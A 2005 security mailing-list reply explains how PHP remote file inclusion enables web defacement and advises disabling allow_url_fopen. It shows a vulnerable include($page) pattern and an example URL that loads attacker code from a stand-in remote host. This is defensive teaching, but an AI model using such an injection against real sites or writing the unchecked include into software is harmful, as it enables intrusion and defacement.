Security Basics mailing list archives

Re: How webpage defacement possible just using web hacking?

From: Eduardo Kienetz <eduardok () gmail com>
Date: Wed, 9 Mar 2005 13:10:30 -0300

allow_url_fopen should be set to off in your php.ini
That allows the possibility of exploiting PHP web applications that
were not properly written.
Example:
http://www.blabla.com/t.php?page=/comments.php
At the code we suppose:
include($page);
If url_fopen is allowed (and $page is not properly checked) I could just try:
http://www.blabla.com/t.php?page=http://www.bbazdfq.com/maliciuscode.php

Usually the extension is even of an image, but with php code in it.

Regards,

Eduardo Bacchi Kienetz
LPI level 1 Certified